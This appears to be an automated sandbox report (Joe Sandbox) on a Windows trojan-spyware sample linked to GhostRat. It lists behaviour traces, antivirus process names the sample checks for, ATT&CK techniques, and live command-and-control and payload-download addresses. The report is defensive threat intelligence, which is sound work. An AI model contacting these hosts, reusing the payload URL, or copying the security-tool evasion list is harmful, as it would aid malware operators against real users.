                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exe Code function: 0_2_10016BF4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_10016BF4
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_03635D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,5_2_03635D22
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe Code function: 5_2_03626A70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,5_2_03626A70
                              Source: HGwpjJUqhW.exe Binary or memory string: acs.exe
                              Source: HGwpjJUqhW.exe Binary or memory string: vsserv.exe
                              Source: HGwpjJUqhW.exe Binary or memory string: kxetray.exe
                              Source: HGwpjJUqhW.exe Binary or memory string: avcenter.exe
                              Source: HGwpjJUqhW.exe Binary or memory string: KSafeTray.exe
                              Source: HGwpjJUqhW.exe Binary or memory string: cfp.exe
                              Source: HGwpjJUqhW.exe Binary or memory string: avp.exe
                              Source: HGwpjJUqhW.exe Binary or memory string: 360Safe.exe
                              Source: HGwpjJUqhW.exe Binary or memory string: rtvscan.exe
                              Source: HGwpjJUqhW.exe Binary or memory string: 360tray.exe
                              Source: HGwpjJUqhW.exe Binary or memory string: ashDisp.exe
                              Source: HGwpjJUqhW.exe Binary or memory string: TMBMSRV.exe
                              Source: HGwpjJUqhW.exe Binary or memory string: 360Tray.exe
                              Source: HGwpjJUqhW.exe Binary or memory string: avgwdsvc.exe
                              Source: HGwpjJUqhW.exe Binary or memory string: AYAgent.aye
                              Source: HGwpjJUqhW.exe Binary or memory string: RavMonD.exe
                              Source: HGwpjJUqhW.exe Binary or memory string: QUHLPSVC.EXE
                              Source: HGwpjJUqhW.exe Binary or memory string: Mcshield.exe
                              Source: HGwpjJUqhW.exe Binary or memory string: K7TSecurity.exe

                              Stealing of Sensitive Information

                              Source: Yara match, File source: 5.2.HGwpjJUqhW.exe.3401004.4.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.a64c83.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.46c2c53.5.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.a3301b.1.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.46f486b.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.a3b823.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.2.HGwpjJUqhW.exe.34a05bf.5.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.2.HGwpjJUqhW.exe.3620000.6.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.2.HGwpjJUqhW.exe.3620000.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.2.HGwpjJUqhW.exe.3401004.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.a64c83.0.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.2.HGwpjJUqhW.exe.49505eb.8.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.2.HGwpjJUqhW.exe.34a05bf.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.46f486b.7.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.2.HGwpjJUqhW.exe.49505eb.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.46c2c53.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.a3301b.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 00000005.00000002.4137601015.0000000003400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000003.2968963191.000000000455A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000003.2061027925.0000000000A32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000003.2138397079.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000003.2927936986.0000000004651000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000003.2138397079.00000000046C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000003.2927936986.00000000046F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000002.4139867488.0000000004950000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000003.2927191607.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: Process Memory Space: HGwpjJUqhW.exe PID: 7652, type: MEMORYSTR

                              Remote Access Functionality

                              Source: Yara match, File source: 5.2.HGwpjJUqhW.exe.3401004.4.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.a64c83.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.46c2c53.5.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.a3301b.1.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.46f486b.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.a3b823.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.2.HGwpjJUqhW.exe.34a05bf.5.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.2.HGwpjJUqhW.exe.3620000.6.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.2.HGwpjJUqhW.exe.3620000.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.2.HGwpjJUqhW.exe.3401004.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.a64c83.0.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.2.HGwpjJUqhW.exe.49505eb.8.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.2.HGwpjJUqhW.exe.34a05bf.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.46f486b.7.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.2.HGwpjJUqhW.exe.49505eb.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.46c2c53.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 5.3.HGwpjJUqhW.exe.a3301b.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 00000005.00000002.4137601015.0000000003400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000003.2968963191.000000000455A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000003.2061027925.0000000000A32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000003.2138397079.0000000004691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000003.2927936986.0000000004651000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000003.2138397079.00000000046C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000003.2927936986.00000000046F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000002.4139867488.0000000004950000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000005.00000003.2927191607.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: Process Memory Space: HGwpjJUqhW.exe PID: 7652, type: MEMORYSTR

                              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
                              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
                              Initial Access: 1 Replication Through Removable Media; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
                              Execution: 1 Native API; 2 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
                              Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
                              Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 222 Process Injection; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
                              Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 1 Modify Registry; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 222 Process Injection; 1 Indicator Removal
                              Credential Access: 121 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
                              Discovery: 2 System Time Discovery; 11 Peripheral Device Discovery; 2 File and Directory Discovery; 26 System Information Discovery; 1 Query Registry; 41 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; Network Service Discovery; System Network Connections Discovery
                              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
                              Collection: 11 Archive Collected Data; 1 Screen Capture; 121 Input Capture; 2 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
                              Command and Control: 2 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
                              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
                              Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

                              Behavior graph (Behavior Graph ID: 1584088, Sample: HGwpjJUqhW.exe, Startdate: 04/01/2025, Architecture: WINDOWS, Score: 100)
                              DNS/IP info: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com (47.79.48.211, 443, 49735; VODAFONE-TRANSIT-ASVodafoneNZLtdNZ, United States); 118.107.44.219 (18852, 19091, 19092; BCPL-SGBGPNETGlobalASNSG, Singapore)
                              Dropped files: C:\Users\user\AppData\...\HGwpjJUqhW.exe (PE32); C:\Users\...\HGwpjJUqhW.exe:Zone.Identifier (ASCII); C:\Users\...\pc_yyb_2700200680_installer.exe (PE32+); C:\...\pc_yyb_2700200680_installer[1].exe (PE32+)
                              Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 7 other signatures; Detected unpacking (overwrites its own PE header); Adds a directory exclusion to Windows Defender; Contains functionality to inject threads in other processes; Contains functionality to capture and log keystrokes; Contains functionality to inject code into remote processes; Bypasses PowerShell execution policy; Loading BitLocker PowerShell Module
                              Processes: HGwpjJUqhW.exe; cmd.exe; powershell.exe; conhost.exe; WmiPrvSE.exe

                              Source | Detection | Scanner | Label
                              HGwpjJUqhW.exe | 12% | Virustotal |
                              HGwpjJUqhW.exe | 8% | ReversingLabs |

                              Source | Detection | Scanner | Label
                              C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe | 8% | ReversingLabs |

                              No Antivirus matches
                              No Antivirus matches

                              Source | Detection | Scanner | Label
                              https://yybadaccess.sparta.html5.qq.com/upload/callback_log?remote_path= | 0% | Avira URL Cloud | safe
                              https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exe/l | 0% | Avira URL Cloud | safe
                              https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exef2 | 0% | Avira URL Cloud | safe
                              https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exe | 0% | Avira URL Cloud | safe
                              https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/ | 0% | Avira URL Cloud | safe
                              https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_27R | 0% | Avira URL Cloud | safe
                              https://yybadaccess.sparta.html5.qq.com/pc_yyb/pcyyb_get_downloader_policy | 0% | Avira URL Cloud | safe
                              https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exe; | 0% | Avira URL Cloud | safe
                              https://yybadaccess.sparta.html5.qq.com/pcyybopen/pcyyb_recall | 0% | Avira URL Cloud | safe
                              https://yybadaccess.sparta.html5.qq.com/pc_yyb/pcyyb_get_downloader_policyhttps://yybadaccess.3g.qq. | 0% | Avira URL Cloud | safe
                              https://yybadaccess.sparta.html5.qq.com/pcyybopen/pcyyb_recallhttps://yybadaccess.3g.qq.com/pcyybope | 0% | Avira URL Cloud | safe
                              http://www.microsoft.q | 0% | Avira URL Cloud | safe
                              https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/;% | 0% | Avira URL Cloud | safe
                              https://support.qq.com/product/ | 0% | Avira URL Cloud | safe
                              118.107.44.219:19091 | 0% | Avira URL Cloud | safe
                              http://crl.microo | 0% | Avira URL Cloud | safe
                              https://txc.qq.com/static/desktop/img/products/def-product-logo.png | 0% | Avira URL Cloud | safe
                              https://yybadaccess.sparta.html5.qq.com/v3/pcyyb_client_updatehttps://yybadaccess.3g.qq.com/v3/pcyyb | 0% | Avira URL Cloud | safe
                              118.107.44.219:19092 | 0% | Avira URL Cloud | safe
                              https://yybadaccess.sparta.html5.qq.com/v3/pcyyb_client_update | 0% | Avira URL Cloud | safe
                              http://crl.microl | 0% | Avira URL Cloud | safe
                              https://ion=v4.5 | 0% | Avira URL Cloud | safe

                              Name | IP | Active | Malicious | Antivirus Detection | Reputation
                              bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com | 47.79.48.211 | true | false | | unknown

                              Name | Malicious | Antivirus Detection | Reputation
                              https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exe | false | Avira URL Cloud: safe | unknown
                              118.107.44.219:19092 | true | Avira URL Cloud: safe | unknown
                              118.107.44.219:19091 | true | Avira URL Cloud: safe | unknown

IP              Domain                                          Country        ASN    ASN Name                            Malicious
118.107.44.219  unknown                                         Singapore      64050  BCPL-SGBGPNETGlobalASNSG            true
47.79.48.211    bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com  United States  9500   VODAFONE-TRANSIT-ASVodafoneNZLtdNZ  false
                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1584088
                                                                                                            Start date and time:2025-01-04 05:37:23 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 9m 43s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:22
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:HGwpjJUqhW.exe
                                                                                                            renamed because original name is a hash value
                                                                                                            Original Sample Name:e60b3fe4e29a9ea4ba95fc3d951d63e90adc05b2a362234669bbd56292197547.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@29/29@1/2
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 50%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 65%
                                                                                                            • Number of executed functions: 186
                                                                                                            • Number of non-executed functions: 197
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 3696 because it is empty
                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7744 because it is empty
                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7916 because it is empty
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
23:38:16  API Interceptor  46x Sleep call for process: powershell.exe modified
23:38:46  API Interceptor  3546989x Sleep call for process: HGwpjJUqhW.exe modified
Match           Associated Sample Name / URL  Detection  Threat Name
118.107.44.219  zhuzhu.exe                    malicious  GhostRat, XRed
118.107.44.219  QQyisSetups64.exe             malicious  GhostRat
118.107.44.219  wyySetups64.exe               malicious  GhostRat
118.107.44.219  MEuu1a2o6n.exe                malicious  GhostRat
118.107.44.219  OdiHmn3pRK.exe                malicious  Unknown
47.79.48.211    zhuzhu.exe                    malicious  GhostRat, XRed
47.79.48.211    QQyisSetups64.exe             malicious  GhostRat
Match                                           Associated Sample Name / URL  Detection  Threat Name     Context
bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com  zhuzhu.exe                    malicious  GhostRat, XRed  47.79.48.211
bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com  QQyisSetups64.exe             malicious  GhostRat        47.79.48.211
Match                     Associated Sample Name / URL                       Detection  Threat Name     Context
BCPL-SGBGPNETGlobalASNSG  vYeaC4s9zP.exe                                     malicious  GhostRat        27.124.4.60
BCPL-SGBGPNETGlobalASNSG  Payment Receipt.exe                                malicious  FormBook        134.122.133.80
BCPL-SGBGPNETGlobalASNSG  BrSgiTp1iH.exe                                     malicious  GhostRat        134.122.135.95
BCPL-SGBGPNETGlobalASNSG  http://smbc.usobd.com                              malicious  Unknown         134.122.128.92
BCPL-SGBGPNETGlobalASNSG  zhuzhu.exe                                         malicious  GhostRat, XRed  118.107.44.219
BCPL-SGBGPNETGlobalASNSG  017069451a4dbc523a1165a2f1bd361a762bb40856778.exe  malicious  Unknown         27.124.34.140
BCPL-SGBGPNETGlobalASNSG  Lets-x64.exe                                       malicious  Nitol, Zegost   202.79.169.178
BCPL-SGBGPNETGlobalASNSG  KL-3.1.16.exe                                      malicious  Nitol, Zegost   143.92.60.116
BCPL-SGBGPNETGlobalASNSG  Whyet-4.9.exe                                      malicious  Nitol, Zegost   118.107.45.13
                                                                                                                          QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                          • 118.107.44.219
                                                                                                                          VODAFONE-TRANSIT-ASVodafoneNZLtdNZ1731043030539.exeGet hashmaliciousReflectiveLoaderBrowse
                                                                                                                          • 47.76.199.218
                                                                                                                          armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.78.236.90
                                                                                                                          botx.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 49.226.28.57
                                                                                                                          zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                          • 47.79.48.211
